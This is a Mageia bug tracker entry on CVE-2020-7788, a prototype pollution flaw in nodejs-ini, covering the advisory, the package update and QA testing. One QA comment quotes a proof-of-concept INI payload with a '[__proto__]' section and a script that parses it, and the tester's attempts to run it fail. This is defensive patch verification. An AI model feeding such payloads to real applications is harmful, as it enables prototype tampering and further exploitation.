Bug 27901 - nodejs-ini new security issue CVE-2020-7788
Summary: nodejs-ini new security issue CVE-2020-7788
Status: NEW
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security (show other bugs)
Version: 7
Hardware: All Linux
Priority: Normal major
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2020-12-22 17:19 CET by David Walser
Modified: 2021-01-02 23:45 CET (History)
2 users (show)

See Also:
Source RPM: nodejs-ini-1.3.5-3.mga8.src.rpm
CVE:
Status comment:


Attachments

Description David Walser 2020-12-22 17:19:55 CET
Debian-LTS has issued an advisory on December 21:
https://www.debian.org/lts/security/2020/dla-2503

The issue is fixed upstream in 1.3.6.

Mageia 7 is also affected.
David Walser 2020-12-22 17:42:25 CET

Whiteboard: (none) => MGA7TOO

Comment 1 Lewis Smith 2020-12-22 20:37:35 CET
Assigning to Stig for this SRPM.

Assignee: bugsquad => smelror

Comment 2 Nicolas Lécureuil 2020-12-25 18:42:04 CET
fixed in cauldron by updating to version 1.3.8

Version: Cauldron => 7
CC: (none) => mageia
Whiteboard: MGA7TOO => (none)

Comment 3 Nicolas Lécureuil 2020-12-25 19:43:55 CET
updated in mga7 ( to 1.3 branch , to make sure we do not break other nodejs deps )
src: 
    nodejs-ini-1.3.8-1.mga7

Assignee: smelror => qa-bugs

Comment 4 David Walser 2020-12-25 19:55:00 CET
Advisory:
========================

Updated nodejs-ini package fixes security vulnerability:

It was discovered that there was an issue in nodejs-ini, where an application
could be exploited by a malicious input file. This affects the package ini
before 1.3.6. If an attacker submits a malicious INI file to an application
that parses it with ini.parse, they will pollute the prototype on the
application. This can be exploited further depending on the context
(CVE-2020-7788).


References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7788
https://www.debian.org/lts/security/2020/dla-2503
========================

Updated packages in core/updates_testing:
========================
nodejs-ini-1.3.8-1.mga7

from nodejs-ini-1.3.8-1.mga7.src.rpm
Comment 5 Len Lawrence 2020-12-30 21:07:21 CET
mga7, x86_64

Installed nodejs files before updating.

CVE-2020-7788
https://snyk.io/vuln/SNYK-JS-INI-1048974
$ cat payload.ini
[__proto__]
polluted = "polluted"
$ cat poc.js
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)

The test is to use nodejs interactively - this is what is expected:
$ node
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted

But this is what happens here:
$ node
> node poc.js
Thrown:
node poc.js
     ^^^

SyntaxError: Unexpected identifier
> poc.js
Thrown:
ReferenceError: poc is not defined
> .exit

Cannot figure out what is going on here.  The REPL definitely works so maybe my interpretation of the PoC procedure is wrong.

CC: (none) => tarazed25

Comment 6 Len Lawrence 2021-01-02 23:45:26 CET
Running the PoC code explicitly in the REPL does not work.
$ node
> var fs = require('fs')
undefined
> var ini = require('ini')
Thrown:
{ Error: Cannot find module 'ini'
    at Function.Module._resolveFilename (internal/modules/cjs/loader.js:636:15)
    at Function.Module._load (internal/modules/cjs/loader.js:562:25)
    at Module.require (internal/modules/cjs/loader.js:692:17)
    at require (internal/modules/cjs/helpers.js:25:18) code: 'MODULE_NOT_FOUND' }
> 
> var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
Thrown:
TypeError: Cannot read property 'parse' of undefined
> console.log(parsed)
undefined
undefined
> console.log(parsed.__proto__)
Thrown:
TypeError: Cannot read property '__proto__' of undefined
> console.log(polluted)
Thrown:
ReferenceError: polluted is not defined
> .exit

Note You need to log in before you can comment on or make changes to this bug.